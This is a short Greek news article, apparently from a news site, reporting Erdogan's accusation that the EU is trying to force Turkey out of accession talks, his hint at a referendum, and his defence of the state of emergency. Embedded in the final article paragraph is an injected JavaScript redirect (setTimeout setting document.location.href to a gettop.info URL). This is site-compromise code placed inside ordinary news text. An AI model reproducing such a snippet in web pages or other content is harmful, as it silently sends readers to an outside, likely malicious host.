Ο Ερντογάν απειλεί τις Βρυξέλλες με δημοψήφισμα

0
2

 

Νέα επίθεση εναντίον των Βρυξελλών εξαπολύει ο Τούρκος πρόεδρος Ταγίπ Ερντογάν που κατηγορεί την ΕΕ ότι επιχειρεί να αναγκάσει την Άγκυρα να εγκαταλείψει τη διαδικασία για την ένταξή της στην ΕΕ σημειώνοντας μάλιστα σε συνέντευξή του στην τουρκική Hurriyet, πως μπορεί να προκηρυχθεί δημοψήφισμα για να αποφασιστεί το ζήτημα.

«Η ΕΕ επιδιώκει να μας υποχρεώσει να αποσυρθούμε απ’ αυτή τη διαδικασία (της ένταξης). Αν δεν μας θέλουν, ας το κάνουν ξεκάθαρα γνωστό, ας πάρουν την απόφαση», δήλωσε ο Ερντογάν και συμπλήρωσε: «Η υπομονή μας δεν είναι απεριόριστη. Αν χρειαστεί, αργότερα, μπορεί να συμβουλευτούμε κι εμείς τον λαό μας» και επικαλούμενος το Brexit, συμπλήρωσε: «Κι εμείς μπορούμε να ρωτήσουμε τον λαό μας».

Όσο για την κατάστασγ στο εσωτερικό της χώρας του με τις εκκαθαρίσεις και τις διώξεις που συνεχίζονται ο Ερντογάν σημείωσε: «Ορισμένοι λένε: «Πρέπει να αρθεί η κατάσταση έκτακτης ανάγκης». Γιατί να την άρουμε τώρα;». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here